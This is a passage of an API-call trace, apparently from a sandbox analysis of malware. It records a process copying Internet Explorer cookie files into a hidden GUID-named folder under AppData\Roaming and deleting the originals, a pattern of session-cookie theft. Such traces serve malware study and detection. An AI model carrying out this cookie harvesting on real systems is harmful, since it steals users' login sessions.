lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\LC10XEWL.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\LC10XEWL.txt" [0252.620] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LC10XEWL.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\lc10xewl.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\LC10XEWL.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\lc10xewl.txt"), bFailIfExists=0) returned 1 [0252.625] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LC10XEWL.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\lc10xewl.txt")) returned 1 [0252.626] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.626] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.626] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.626] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.627] StrChrW (lpStart="Low\\LVARU12Y.txt", wMatch=0x74c005c) returned="\\LVARU12Y.txt" [0252.627] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.627] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.627] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.627] StrChrW (lpStart="LVARU12Y.txt", wMatch=0x74c005c) returned 0x0 [0252.627] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="LVARU12Y.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\LVARU12Y.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\LVARU12Y.txt" [0252.627] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LVARU12Y.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\lvaru12y.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\LVARU12Y.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\lvaru12y.txt"), bFailIfExists=0) returned 1 [0252.632] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LVARU12Y.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\lvaru12y.txt")) returned 1 [0252.633] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.633] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.633] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.633] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.633] StrChrW (lpStart="Low\\LY1NFEKN.txt", wMatch=0x74c005c) returned="\\LY1NFEKN.txt" [0252.633] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.642] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.642] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.642] StrChrW (lpStart="LY1NFEKN.txt", wMatch=0x74c005c) returned 0x0 [0252.642] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="LY1NFEKN.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\LY1NFEKN.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\LY1NFEKN.txt" [0252.642] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LY1NFEKN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ly1nfekn.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\LY1NFEKN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\ly1nfekn.txt"), bFailIfExists=0) returned 1 [0252.647] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LY1NFEKN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ly1nfekn.txt")) returned 1 [0252.648] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.648] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.648] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.648] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.648] StrChrW (lpStart="Low\\LY3FDU65.txt", wMatch=0x74c005c) returned="\\LY3FDU65.txt" [0252.648] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.648] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.648] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.648] StrChrW (lpStart="LY3FDU65.txt", wMatch=0x74c005c) returned 0x0 [0252.648] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="LY3FDU65.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\LY3FDU65.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\LY3FDU65.txt" [0252.649] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LY3FDU65.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ly3fdu65.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\LY3FDU65.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\ly3fdu65.txt"), bFailIfExists=0) returned 1 [0252.654] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LY3FDU65.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ly3fdu65.txt")) returned 1 [0252.655] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.655] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.655] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.655] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.655] StrChrW (lpStart="Low\\M19117WZ.txt", wMatch=0x74c005c) returned="\\M19117WZ.txt" [0252.655] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.655] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.655] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.655] StrChrW (lpStart="M19117WZ.txt", wMatch=0x74c005c) returned 0x0 [0252.655] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="M19117WZ.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\M19117WZ.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\M19117WZ.txt" [0252.655] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\M19117WZ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\m19117wz.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\M19117WZ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\m19117wz.txt"), bFailIfExists=0) returned 1 [0252.660] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\M19117WZ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\m19117wz.txt")) returned 1 [0252.661] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.661] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.661] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.661] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.661] StrChrW (lpStart="Low\\MA5WDFBR.txt", wMatch=0x74c005c) returned="\\MA5WDFBR.txt" [0252.661] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.661] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.661] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.661] StrChrW (lpStart="MA5WDFBR.txt", wMatch=0x74c005c) returned 0x0 [0252.661] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="MA5WDFBR.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MA5WDFBR.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MA5WDFBR.txt" [0252.661] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MA5WDFBR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ma5wdfbr.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MA5WDFBR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\ma5wdfbr.txt"), bFailIfExists=0) returned 1 [0252.668] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MA5WDFBR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ma5wdfbr.txt")) returned 1 [0252.669] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.669] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.669] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: 